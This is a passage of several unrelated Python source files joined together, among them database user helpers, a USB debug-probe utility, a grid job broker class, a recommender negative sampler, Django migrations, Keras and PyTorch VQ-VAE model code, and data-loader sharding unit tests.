    """Return the user dict for *uuid*, or None when no record exists."""
    usr = session.query(AccountUser).filter_by(uuid=uuid).one_or_none()
    return usr.to_dict() if usr else None
def list_for_account(accountname, session=None):
    """Return dicts for all users belonging to *accountname*."""
    users = session.query(AccountUser).filter_by(account_name=accountname)
    return [u.to_dict() for u in users] if users else []
def delete(username, session=None):
    """Delete the user record; return True if one was removed, else False."""
    result = session.query(AccountUser).filter_by(username=username).one_or_none()
    if not result:
        return False
    session.delete(result)
    return True
| 5,376 | 1,584 |
#
# Copyright (c) 2019, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
import sys, time
from lib.utility import *
# ------------------------------------------------
VID, PID = 0x0451, 0xbef3 # XDS110
# ------------------------------------------------
try:
import usb
except Exception as e:
print('exception : lib :', e, file=sys.stderr, flush=True)
# ------------------------------------------------
def usb_init(desc_print=True, nodev_exit=True):
    """Find the XDS110 debug probe (VID/PID above) on the USB bus.

    Returns the pyusb device handle, annotated with _detached_ (interfaces
    detached later; see usb_free) and _serno_ (serial number), or None when
    pyusb is missing or lookup fails. When no device is present and
    nodev_exit is set, the process exits with status 1.
    """
    if 'usb' not in sys.modules: return None  # pyusb failed to import
    try:
        dev = usb.core.find(idVendor=VID, idProduct=PID)
        if dev is not None:
            dev._detached_ = []
            m = usb.util.get_string(dev, dev.iManufacturer)
            p = usb.util.get_string(dev, dev.iProduct)
            s = usb.util.get_string(dev, dev.iSerialNumber)
            dev._serno_ = s
            if desc_print:
                print('{} : {} : {}'.format(m, p, s), file=sys.stderr, flush=True)
            return dev
        elif nodev_exit:
            print('exception : main :', 'no device has been detected', file=sys.stderr)
            sys.exit(1)
    except Exception as e:
        print(e)
    return None
def usb_point(dev, num, out):
    """Return an endpoint of interface *num* on the active configuration:
    the OUT endpoint when *out* is truthy, otherwise the IN endpoint.
    Returns None when pyusb is unavailable or no endpoint matches."""
    if 'usb' not in sys.modules: return None
    ept = (usb.util.ENDPOINT_IN, usb.util.ENDPOINT_OUT)
    cfg = dev.get_active_configuration()
    intf = cfg[(num, 0)]
    # Match the first endpoint whose direction corresponds to the request.
    ep = usb.util.find_descriptor(intf,
        custom_match=lambda e: usb.util.endpoint_direction(
            e.bEndpointAddress) == ept[int(out % 2)])
    return ep
def usb_free(dev):
    """Release all claimed USB resources on *dev* and re-attach the kernel
    drivers that were detached while the device was in use."""
    if 'usb' not in sys.modules: return None
    usb.util.dispose_resources(dev)
    for ifn in dev._detached_:
        usb.util.release_interface(dev, ifn)
        try:
            dev.attach_kernel_driver(ifn)
        except Exception:
            # BUGFIX: narrowed from a bare except. Re-attaching is
            # best-effort; the driver may already be bound.
            pass
# ------------------------------------------------
def xds_reset(dev, delay=50):
    """Pulse the XDS110 reset line: write the command with value 00 then 01
    on interface 2's OUT endpoint, waiting *delay* milliseconds after each.
    Returns True on success, False when the endpoint is unavailable."""
    #_ = {0:'CDC Communication',
    # 1:'CDC Data', 2:'Vendor Specific', 3:'CDC Communication',
    # 4:'CDC Data', 5:'Human Interface Device', 6:'Vendor Specific'}
    ep = usb_point(dev, 2, True)
    if ep is None: return False
    for v in ('00', '01'):
        # NOTE(review): '2a 02 00 0e <v>' appears to be the XDS110 command
        # framing for the reset request — confirm against the XDS110 docs.
        ep.write(hex2dec('{} {} {} {}'.format('2a', '02', '00', '0e {}'.format(v))))
        time.sleep(delay / 1000)
    return True
| 2,314 | 803 |
from pandajedi.jedicore import Interaction
# base class for job brokerage
class JobBrokerBase (object):
    """Shared state and helpers for JEDI job brokers: site mapping, process
    locking, live job counters, and unified/pseudo site-name translation."""

    def __init__(self,ddmIF,taskBufferIF):
        self.ddmIF = ddmIF                # distributed data management interface
        self.taskBufferIF = taskBufferIF  # task buffer (DB) interface
        self.liveCounter = None           # optional per-site live job counter
        self.lockID = None                # per-thread lock identifier
        self.baseLockID = None            # per-process lock identifier
        self.useLock = False              # whether site locking was activated
        self.testMode = False
        self.refresh()
        self.task_common = None           # dict shared across brokerage steps

    # set task common dictionary
    def set_task_common_dict(self, task_common):
        self.task_common = task_common

    # get task common attribute (None when the dict is unset or key missing)
    def get_task_common(self, attr_name):
        if self.task_common:
            return self.task_common.get(attr_name)

    # set task common attribute
    def set_task_common(self, attr_name, attr_value):
        self.task_common[attr_name] = attr_value

    def refresh(self):
        # Reload the site mapper from the task buffer.
        self.siteMapper = self.taskBufferIF.getSiteMapper()

    def setLiveCounter(self,liveCounter):
        self.liveCounter = liveCounter

    def getLiveCount(self,siteName):
        # 0 when no live counter is configured.
        if self.liveCounter is None:
            return 0
        return self.liveCounter.get(siteName)

    def setLockID(self,pid,tid):
        # Process-level ID plus a thread-qualified variant.
        self.baseLockID = '{0}-jbr'.format(pid)
        self.lockID = '{0}-{1}'.format(self.baseLockID,tid)

    def getBaseLockID(self):
        # Only meaningful once locking has been activated.
        if self.useLock:
            return self.baseLockID
        return None

    def releaseSiteLock(self, vo, prodSourceLabel, queue_id):
        # FIXME: releaseSiteLock method is unused elsewhere
        if self.useLock:
            self.taskBufferIF.unlockProcessWithPID_JEDI(vo, prodSourceLabel, queue_id, self.lockID, False)

    def lockSite(self, vo, prodSourceLabel, siteName, queue_id):
        if not self.useLock:
            self.useLock = True
        # FIXME: lockSite method is unused elsewhere; lockProcess_JEDI arguments have changed and are incompatible with the following line
        # self.taskBufferIF.lockProcess_JEDI(vo, prodSourceLabel, siteName, queue_id, self.lockID, True)

    def checkSiteLock(self, vo, prodSourceLabel, siteName, queue_id, resource_name):
        # Check whether another broker process holds the lock for this site.
        return self.taskBufferIF.checkProcessLock_JEDI( vo=vo, prodSourceLabel=prodSourceLabel,
                                                        cloud=siteName, workqueue_id=queue_id,
                                                        resource_name=resource_name,
                                                        component=None, pid=self.baseLockID, checkBase=True)

    def setTestMode(self):
        self.testMode = True

    # get list of unified sites (deduplicated unified names for the scan list)
    def get_unified_sites(self, scan_site_list):
        unified_list = set()
        for tmpSiteName in scan_site_list:
            tmpSiteSpec = self.siteMapper.getSite(tmpSiteName)
            unifiedName = tmpSiteSpec.get_unified_name()
            unified_list.add(unifiedName)
        return tuple(unified_list)

    # get list of pseudo sites whose unified name is in unified_list
    def get_pseudo_sites(self, unified_list, scan_site_list):
        unified_list = set(unified_list)
        pseudo_list = set()
        for tmpSiteName in scan_site_list:
            tmpSiteSpec = self.siteMapper.getSite(tmpSiteName)
            if tmpSiteSpec.get_unified_name() in unified_list:
                pseudo_list.add(tmpSiteName)
        return tuple(pseudo_list)

    # add pseudo sites to skip, copying each unified site's skip reason
    def add_pseudo_sites_to_skip(self, unified_dict, scan_site_list, skipped_dict):
        for tmpSiteName in scan_site_list:
            tmpSiteSpec = self.siteMapper.getSite(tmpSiteName)
            if tmpSiteSpec.get_unified_name() in unified_dict:
                skipped_dict[tmpSiteName] = unified_dict[tmpSiteSpec.get_unified_name()]
        return skipped_dict
# Register JobBrokerBase with the Interaction module (installSC semantics
# defined in pandajedi.jedicore.Interaction).
Interaction.installSC(JobBrokerBase)
| 3,760 | 1,136 |
from .base import AbstractNegativeSampler
from tqdm import trange
from tqdm import tqdm
from collections import Counter
import numpy as np
class PopularNegativeSampler(AbstractNegativeSampler):
    """Negative sampler that draws items with probability proportional to
    their overall popularity across the train/val/test splits."""

    @classmethod
    def code(cls):
        return 'popular'

    def generate_negative_samples(self):
        """For every test user, draw `sample_size` unseen items, popularity-weighted."""
        popularity = self.items_by_popularity()
        item_ids = list(popularity.keys())
        counts = [popularity[item] for item in item_ids]
        total = np.sum(counts)
        weights = [count / total for count in counts]

        negative_samples = {}
        print('Sampling negative items')
        for user in tqdm(self.test):
            # Items the user interacted with in any split must never be sampled.
            interacted = set(self.train[user])
            interacted.update(self.val[user])
            interacted.update(self.test[user])

            picked = []
            while len(picked) < self.sample_size:
                batch = np.random.choice(item_ids, self.sample_size,
                                         replace=False, p=weights).tolist()
                picked.extend(item for item in batch
                              if item not in interacted and item not in picked)
            negative_samples[user] = picked[:self.sample_size]
        return negative_samples

    def items_by_popularity(self):
        """Count how often each item occurs across train/val/test interactions."""
        popularity = Counter()
        for user in tqdm(self.test):
            popularity.update(self.train[user])
            popularity.update(self.val[user])
            popularity.update(self.test[user])
        return popularity
| 1,467 | 427 |
# Generated by Django 2.0.6 on 2018-07-30 00:06
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds contact fields (email, phone number) to PdfInfo. The numeric
    # defaults (1 and 5) were one-off fill values typed in when the migration
    # was generated for existing rows; preserve_default=False drops them from
    # the model state afterwards.
    dependencies = [
        ('Ebooks', '0008_pdfinfo_pdfdescription'),
    ]
    operations = [
        migrations.AddField(
            model_name='pdfinfo',
            name='PdfEmail',
            field=models.CharField(default=1, max_length=10000),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='pdfinfo',
            name='PdfPhoneNumber',
            field=models.CharField(default=5, max_length=10000),
            preserve_default=False,
        ),
    ]
| 650 | 208 |
from .plot import PlotPhotometryHandler, PlotSpectroscopyHandler
from .token import TokenHandler
from .dbinfo import DBInfoHandler
from .profile import ProfileHandler
from .source_views import SourceViewsHandler
from .instrument_observation_params import InstrumentObservationParamsHandler
| 290 | 71 |
from __future__ import print_function
import tensorflow as tf
import keras
from keras.datasets import mnist
from keras.models import Sequential,model_from_json
from keras.layers import Dense, Dropout
from keras.optimizers import RMSprop
import numpy as np
def save_model(model, filename):
    """Serialize a Keras model: architecture to <filename>.json, weights to <filename>.h5."""
    with open(filename + ".json", "w") as json_file:
        json_file.write(model.to_json())
    # serialize weights to HDF5
    model.save_weights(filename + ".h5")
    print("Saved model to disk in files:", filename)
def load_model(filename):
    """Rebuild a Keras model from <filename>.json (architecture) and
    <filename>.h5 (weights) and return it.

    Bug fix: the original constructed the model but never returned it, so
    every caller received None. The JSON file is now also closed via a
    context manager instead of a manual open/close pair.
    """
    # load json and create model
    with open(filename + ".json", 'r') as json_file:
        loaded_model_json = json_file.read()
    loaded_model = model_from_json(loaded_model_json)
    # load weights into new model
    loaded_model.load_weights(filename + ".h5")
    print("Loaded model from disk")
    return loaded_model
#### EXERCICE 3
# Load MNIST and append a trailing channel axis: (N, 28, 28) -> (N, 28, 28, 1).
(x_train,y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(x_train.shape[0], x_train.shape[1], x_train.shape[2], 1)
x_test = x_test.reshape(x_test.shape[0], x_test.shape[1], x_test.shape[2], 1)
x_train = x_train.astype('float32')
y_train = y_train.astype('float32') # y: ground truth
x_test = x_test.astype('float32')
y_test = y_test.astype('float32')
# Scale grey levels from [0, 255] down to [0, 1] (each image is 28*28*1).
x_train = x_train/ 255
x_test = x_test/255
''' One hot encoding:
transposition en vecteur de taille 10
Valeur 6-> |0|0|0|0|0|0|1|0|0|0|
Valeur 2-> |0|0|1|0|0|0|0|0|0|0|
Valeur 9-> |0|0|1|0|0|0|0|0|0|1|
Fonction de perte (loss):L(
'''
# One-hot encode the labels (10 classes).
y_train = keras.utils.to_categorical(y_train)
y_test = keras.utils.to_categorical(y_test)
filename_from_model="test"
# load_model(filename_from_model)
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Flatten, Dense
def cnn1():
    """Build and compile a small MNIST CNN: conv3x3 -> maxpool -> flatten -> dense x2."""
    num_classes = 10
    model = Sequential()
    model.add(keras.layers.Conv2D(64, kernel_size=(3, 3), activation='relu',
                                  input_shape=(28, 28, 1)))
    model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
    model.add(Flatten())
    # Hidden dense layer (10 ReLU units) followed by the softmax output layer.
    model.add(Dense(10, activation='relu', kernel_initializer='normal'))
    model.add(Dense(num_classes, activation='softmax', kernel_initializer='normal'))
    model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])
    return model
# Training hyper-parameters.
epochs=10 # number of epochs
batch_size=64
cnn = cnn1()
cnn.summary()
cnn.fit(x_train, y_train, validation_data=(x_test,y_test), epochs=epochs, batch_size=batch_size)
save_model(cnn, filename_from_model)
# A saved model can be reloaded later to avoid retraining from scratch.
| 2,854 | 1,117 |
import sys
import torch
from torch import nn
from torch.nn import functional as F
# sys.path.append('../')
#
# from image.vqvae import Quantize
# Copyright 2018 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Borrowed from https://github.com/deepmind/sonnet and ported it to PyTorch
class Quantize(nn.Module):
    """Vector-quantization layer with EMA codebook updates (VQ-VAE style).

    Ported from DeepMind Sonnet. ``embed`` holds the codebook as a
    (dim, n_embed) matrix; ``cluster_size`` and ``embed_avg`` carry the
    exponential moving averages used to re-estimate the codebook while
    training.
    """

    def __init__(self, dim, n_embed, decay=0.99, eps=1e-5, qw=10):
        super().__init__()
        self.qw = qw  # weight of the quantized term in the diff normalizer
        self.dim = dim
        self.n_embed = n_embed
        self.decay = decay  # EMA decay for codebook statistics
        self.eps = eps  # Laplace smoothing of cluster sizes
        embed = torch.randn(dim, n_embed)
        self.register_buffer('embed', embed)
        self.register_buffer('cluster_size', torch.zeros(n_embed))
        self.register_buffer('embed_avg', embed.clone())

    def forward(self, input):
        """Quantize ``input`` (..., dim).

        Returns (quantized, diff, code indices); ``quantized`` uses the
        straight-through estimator so gradients pass to ``input`` unchanged.
        """
        flatten = input.reshape(-1, self.dim)
        # Squared L2 distance from every input vector to every codebook entry.
        dist = (
            flatten.pow(2).sum(1, keepdim=True)
            - 2 * flatten @ self.embed
            + self.embed.pow(2).sum(0, keepdim=True)
        )
        _, embed_ind = (-dist).max(1)
        embed_onehot = F.one_hot(embed_ind, self.n_embed).type(flatten.dtype)
        embed_ind = embed_ind.view(*input.shape[:-1])
        quantize = self.embed_code(embed_ind)

        if self.training:
            # EMA codebook update. Bug fix: the deprecated (and later removed)
            # Tensor.add_(scalar, tensor) overload is replaced by the
            # supported alpha= keyword form; the arithmetic is identical.
            self.cluster_size.data.mul_(self.decay).add_(
                embed_onehot.sum(0), alpha=1 - self.decay
            )
            embed_sum = flatten.transpose(0, 1) @ embed_onehot
            self.embed_avg.data.mul_(self.decay).add_(embed_sum, alpha=1 - self.decay)
            n = self.cluster_size.sum()
            cluster_size = (
                (self.cluster_size + self.eps) / (n + self.n_embed * self.eps) * n
            )
            embed_normalized = self.embed_avg / cluster_size.unsqueeze(0)
            self.embed.data.copy_(embed_normalized)

        # Commitment-style loss normalized by input/codebook magnitudes (qw
        # weights the quantized term in the normalizer).
        norm = input.detach().pow(2).mean() + self.qw * quantize.detach().pow(2).mean()
        diff = ((quantize.detach() - input).pow(2).mean()) / norm
        # Straight-through estimator.
        quantize = input + (quantize - input).detach()
        return quantize, diff, embed_ind

    def embed_code(self, embed_id):
        """Look up codebook vectors for integer code indices."""
        return F.embedding(embed_id, self.embed.transpose(0, 1))
class ResBlock(nn.Module):
    """Residual block: out = x + Conv1x1(ReLU(Conv3x3(ReLU(x))))."""

    def __init__(self, in_channel, channel):
        super().__init__()
        layers = [
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channel, channel, 3, padding=1),
            nn.ReLU(inplace=True),
            nn.Conv2d(channel, in_channel, 1),
        ]
        self.conv = nn.Sequential(*layers)

    def forward(self, input):
        # Residual connection around the conv branch.
        return self.conv(input) + input
class Encoder(nn.Module):
    """Strided conv encoder: downsample by ``stride`` (2, 4 or 8), then ResBlocks.

    Bug fix: the stride==8 branch was a bad merge of two layer stacks — its
    fourth conv expected ``in_channel`` inputs while receiving ``channel``
    feature maps, so the module crashed at forward time. It now performs
    three clean 2x downsamples. An unsupported stride also raises instead
    of leaving ``blocks`` undefined (NameError).
    """

    def __init__(self, in_channel, channel, n_res_block, n_res_channel, stride):
        super().__init__()
        if stride == 8:
            blocks = [
                nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1),
                nn.ReLU(inplace=True),
                nn.Conv2d(channel // 2, channel, 4, stride=2, padding=1),
                nn.ReLU(inplace=True),
                nn.Conv2d(channel, channel, 4, stride=2, padding=1),
                nn.ReLU(inplace=True),
                nn.Conv2d(channel, channel, 3, padding=1),
            ]
        elif stride == 4:
            blocks = [
                nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1),
                nn.ReLU(inplace=True),
                nn.Conv2d(channel // 2, channel, 4, stride=2, padding=1),
                nn.ReLU(inplace=True),
                nn.Conv2d(channel, channel, 3, padding=1),
            ]
        elif stride == 2:
            blocks = [
                nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1),
                nn.ReLU(inplace=True),
                nn.Conv2d(channel // 2, channel, 3, padding=1),
            ]
        else:
            raise ValueError('stride must be 2, 4 or 8, got {}'.format(stride))

        for i in range(n_res_block):
            blocks.append(ResBlock(channel, n_res_channel))
        blocks.append(nn.ReLU(inplace=True))
        self.blocks = nn.Sequential(*blocks)

    def forward(self, input):
        return self.blocks(input)
class Decoder(nn.Module):
    """ResBlocks followed by transposed-conv upsampling by ``stride`` (2, 4 or 8).

    Bug fix: the stride==8 branch appended a fourth transposed conv that
    expected ``channel`` inputs after the stack had already reduced to
    ``out_channel`` maps, so the module crashed at forward time. It now
    performs three clean 2x upsamples. An unsupported stride raises
    instead of silently producing no upsampling.
    """

    def __init__(
        self, in_channel, out_channel, channel, n_res_block, n_res_channel, stride
    ):
        super().__init__()
        blocks = [nn.Conv2d(in_channel, channel, 3, padding=1)]
        for i in range(n_res_block):
            blocks.append(ResBlock(channel, n_res_channel))
        blocks.append(nn.ReLU(inplace=True))

        if stride == 8:
            blocks.extend(
                [
                    nn.ConvTranspose2d(channel, channel // 2, 4, stride=2, padding=1),
                    nn.ReLU(inplace=True),
                    nn.ConvTranspose2d(
                        channel // 2, channel // 2, 4, stride=2, padding=1
                    ),
                    nn.ReLU(inplace=True),
                    nn.ConvTranspose2d(
                        channel // 2, out_channel, 4, stride=2, padding=1
                    ),
                ]
            )
        elif stride == 4:
            blocks.extend(
                [
                    nn.ConvTranspose2d(channel, channel // 2, 4, stride=2, padding=1),
                    nn.ReLU(inplace=True),
                    nn.ConvTranspose2d(
                        channel // 2, out_channel, 4, stride=2, padding=1
                    ),
                ]
            )
        elif stride == 2:
            blocks.append(
                nn.ConvTranspose2d(channel, out_channel, 4, stride=2, padding=1)
            )
        else:
            raise ValueError('stride must be 2, 4 or 8, got {}'.format(stride))
        self.blocks = nn.Sequential(*blocks)

    def forward(self, input):
        return self.blocks(input)
class VQVAE_ML(nn.Module):
    """Multi-level residual VQ-VAE.

    A shared bottleneck is quantized by ``n_level`` codebooks in sequence;
    each codebook quantizes the residual left over by the previous one, and
    the decoder reconstructs from the sum of all quantized levels.
    """

    def __init__(
        self,
        in_channel=3,
        channel=64,
        n_res_block=2,
        n_res_channel=16,
        embed_dim=16,
        n_level=4,
        n_embed = 16,
        decay=0.80,
        stride=4,
    ):
        super().__init__()
        self.device = 'cuda'
        # Two-stage encoder: spatial downsample by `stride`, then again by 2.
        self.enc = Encoder(in_channel, channel, n_res_block, n_res_channel, stride=stride)
        self.enc_t = Encoder(channel, channel, n_res_block, n_res_channel, stride=2)
        self.quantize_conv = nn.Conv2d(channel, embed_dim, 1)
        self.n_level = n_level
        self.quantizes = nn.ModuleList()
        self.quantizes_conv = nn.ModuleList()
        self.bns = nn.ModuleList()
        for i in range(n_level):
            self.quantizes.append(Quantize(embed_dim, n_embed, decay))
            self.quantizes_conv.append(nn.Conv2d(embed_dim, embed_dim, 1))
            self.bns.append(nn.BatchNorm2d(embed_dim))
        # Mirror of the encoder: upsample by 2, then by `stride`.
        self.dec_t = Decoder(
            embed_dim, embed_dim, channel, n_res_block, n_res_channel, stride=2
        )
        self.dec = Decoder(
            embed_dim,
            in_channel,
            channel,
            n_res_block,
            n_res_channel,
            stride=stride,
        )

    def forward(self, input):
        """Reconstruct ``input``; returns (reconstruction, quantization loss)."""
        quant, diff, _, _ = self.encode(input)
        dec = self.decode(quant)
        return dec, diff

    def encode(self, input):
        """Encode and residually quantize ``input``.

        Returns (quant_sum, diffs, quants, ids): the summed quantization over
        all levels, the accumulated losses, the per-level quantized maps
        stacked along dim 1, and the per-level code indices.
        """
        enc = self.enc(input)
        enc = self.enc_t(enc)
        bottleneck = self.quantize_conv(enc)
        ids = None
        quants = None
        diffs = None
        quant_sum = None
        for i, quantize in enumerate(self.quantizes):
            quant, diff, id = quantize(bottleneck.permute(0, 2, 3, 1))
            quant = quant.permute(0, 3, 1, 2)
            diff = diff.unsqueeze(0)
            if diffs is None:
                diffs = diff
                quant_sum = quant
                quants = quant.unsqueeze(1)
                ids = id.unsqueeze(1)
            else:
                # Bug fix: out-of-place accumulation. The original in-place
                # `quant_sum += quant` mutated the level-0 quant tensor, whose
                # storage `quants` still aliased, corrupting the stored levels.
                diffs = diffs + diff
                quant_sum = quant_sum + quant
                quants = torch.cat((quants, quant.unsqueeze(1)), dim=1)
                ids = torch.cat((ids, id.unsqueeze(1)), dim=1)
            # The next codebook quantizes the remaining residual.
            bottleneck = bottleneck - quant
        return quant_sum, diffs, quants, ids

    def decode(self, quant):
        """Decode a (summed) quantized bottleneck back to image space."""
        dec = self.dec_t(quant)
        return self.dec(dec)

    def decode_code(self, codes):
        """Decode per-level code index maps back to an image.

        Bug fix: the original called ``embed_code`` on the ModuleList itself
        instead of the per-level Quantize module, and summed into an
        uninitialized ``None`` accumulator; both crashed at runtime.
        """
        quant_sum = None
        for level, code in enumerate(codes):
            quant = self.quantizes[level].embed_code(code)
            quant = quant.permute(0, 3, 1, 2)
            quant_sum = quant if quant_sum is None else quant_sum + quant
        return self.decode(quant_sum)
| 9,733 | 3,250 |
# Generated by Django 3.1.3 on 2020-12-09 13:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Initial migration: creates the Report table, linked to a patient.
    # Deleting a patient cascades to their reports.
    initial = True
    dependencies = [
        ('patients', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Report',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('used_techniques', models.CharField(max_length=200)),
                ('conclusions', models.CharField(max_length=200)),
                ('patient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='id_patient', to='patients.patient')),
            ],
        ),
    ]
| 848 | 267 |
# Copyright 2021 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import unittest
from torch.utils.data import BatchSampler, IterableDataset
from accelerate.data_loader import BatchSamplerShard, IterableDatasetShard
class RandomIterableDataset(IterableDataset):
    # For testing, an iterable dataset of random length
    def __init__(self, p_stop=0.01, max_length=1000):
        self.p_stop = p_stop
        self.max_length = max_length

    def __iter__(self):
        """Yield 0, 1, 2, ... stopping early with probability p_stop per step,
        and unconditionally after max_length items."""
        for value in range(self.max_length):
            yield value
            if random.random() < self.p_stop:
                break
class DataLoaderTester(unittest.TestCase):
    """Tests for BatchSamplerShard and IterableDatasetShard sharding across
    2 processes (shards)."""

    def check_batch_sampler_shards(self, batch_sampler, expected, split_batches=False):
        """Shard `batch_sampler` across 2 processes and compare each shard's
        batches (and lengths, when not splitting batches) to `expected`."""
        batch_sampler_shards = [BatchSamplerShard(batch_sampler, 2, i, split_batches) for i in range(2)]
        batch_sampler_lists = [list(batch_sampler_shard) for batch_sampler_shard in batch_sampler_shards]
        if not split_batches:
            self.assertListEqual([len(shard) for shard in batch_sampler_shards], [len(e) for e in expected])
        self.assertListEqual(batch_sampler_lists, expected)
    def test_batch_sampler_shards_with_no_splits(self):
        # Check the shards when the dataset is a round multiple of total batch size.
        batch_sampler = BatchSampler(range(24), batch_size=3, drop_last=False)
        expected = [
            [[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]],
            [[3, 4, 5], [9, 10, 11], [15, 16, 17], [21, 22, 23]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected)
        batch_sampler = BatchSampler(range(24), batch_size=3, drop_last=True)
        # Expected shouldn't change
        self.check_batch_sampler_shards(batch_sampler, expected)
        # Check the shards when the dataset is a round multiple of batch size but not total batch size.
        batch_sampler = BatchSampler(range(21), batch_size=3, drop_last=False)
        expected = [
            [[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]],
            [[3, 4, 5], [9, 10, 11], [15, 16, 17], [0, 1, 2]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected)
        batch_sampler = BatchSampler(range(21), batch_size=3, drop_last=True)
        expected = [
            [[0, 1, 2], [6, 7, 8], [12, 13, 14]],
            [[3, 4, 5], [9, 10, 11], [15, 16, 17]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected)
        # Check the shards when the dataset is not a round multiple of batch size but has a multiple of
        # num_processes batch.
        batch_sampler = BatchSampler(range(22), batch_size=3, drop_last=False)
        expected = [
            [[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]],
            [[3, 4, 5], [9, 10, 11], [15, 16, 17], [21, 0, 1]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected)
        batch_sampler = BatchSampler(range(22), batch_size=3, drop_last=True)
        expected = [
            [[0, 1, 2], [6, 7, 8], [12, 13, 14]],
            [[3, 4, 5], [9, 10, 11], [15, 16, 17]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected)
        # Check the shards when the dataset is not a round multiple of batch size but and has not a multiple of
        # num_processes batch.
        batch_sampler = BatchSampler(range(20), batch_size=3, drop_last=False)
        expected = [
            [[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 0]],
            [[3, 4, 5], [9, 10, 11], [15, 16, 17], [1, 2, 3]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected)
        batch_sampler = BatchSampler(range(20), batch_size=3, drop_last=True)
        expected = [
            [[0, 1, 2], [6, 7, 8], [12, 13, 14]],
            [[3, 4, 5], [9, 10, 11], [15, 16, 17]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected)
        # Check the shards when the dataset is very small.
        batch_sampler = BatchSampler(range(2), batch_size=3, drop_last=False)
        expected = [[[0, 1, 0]], [[1, 0, 1]]]
        self.check_batch_sampler_shards(batch_sampler, expected)
        batch_sampler = BatchSampler(range(2), batch_size=3, drop_last=True)
        expected = [[], []]
        self.check_batch_sampler_shards(batch_sampler, expected)
    def test_batch_sampler_shards_with_splits(self):
        # Check the shards when the dataset is a round multiple of batch size.
        batch_sampler = BatchSampler(range(24), batch_size=4, drop_last=False)
        expected = [
            [[0, 1], [4, 5], [8, 9], [12, 13], [16, 17], [20, 21]],
            [[2, 3], [6, 7], [10, 11], [14, 15], [18, 19], [22, 23]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
        batch_sampler = BatchSampler(range(24), batch_size=4, drop_last=True)
        # Expected shouldn't change
        self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
        # Check the shards when the dataset is not a round multiple of batch size.
        batch_sampler = BatchSampler(range(22), batch_size=4, drop_last=False)
        expected = [
            [[0, 1], [4, 5], [8, 9], [12, 13], [16, 17], [20, 21]],
            [[2, 3], [6, 7], [10, 11], [14, 15], [18, 19], [0, 1]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
        batch_sampler = BatchSampler(range(22), batch_size=4, drop_last=True)
        expected = [
            [[0, 1], [4, 5], [8, 9], [12, 13], [16, 17]],
            [[2, 3], [6, 7], [10, 11], [14, 15], [18, 19]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
        # Check the shards when the dataset is not a round multiple of batch size or num_processes.
        batch_sampler = BatchSampler(range(21), batch_size=4, drop_last=False)
        expected = [
            [[0, 1], [4, 5], [8, 9], [12, 13], [16, 17], [20, 0]],
            [[2, 3], [6, 7], [10, 11], [14, 15], [18, 19], [1, 2]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
        batch_sampler = BatchSampler(range(21), batch_size=4, drop_last=True)
        expected = [
            [[0, 1], [4, 5], [8, 9], [12, 13], [16, 17]],
            [[2, 3], [6, 7], [10, 11], [14, 15], [18, 19]],
        ]
        self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
        # Check the shards when the dataset is very small.
        batch_sampler = BatchSampler(range(2), batch_size=4, drop_last=False)
        expected = [[[0, 1]], [[0, 1]]]
        self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
        batch_sampler = BatchSampler(range(2), batch_size=4, drop_last=True)
        expected = [[], []]
        self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
    def check_iterable_dataset_shards(
        self, dataset, seed, batch_size, drop_last=False, num_processes=2, split_batches=False
    ):
        """Shard `dataset` across `num_processes` and verify that all shards
        have the same length (a multiple of the per-shard batch size) and that,
        re-interleaved, they reproduce the reference iteration order."""
        random.seed(seed)
        reference = list(dataset)
        iterable_dataset_shards = [
            IterableDatasetShard(
                dataset,
                batch_size=batch_size,
                drop_last=drop_last,
                num_processes=num_processes,
                process_index=i,
                split_batches=split_batches,
            )
            for i in range(num_processes)
        ]
        iterable_dataset_lists = []
        for iterable_dataset_shard in iterable_dataset_shards:
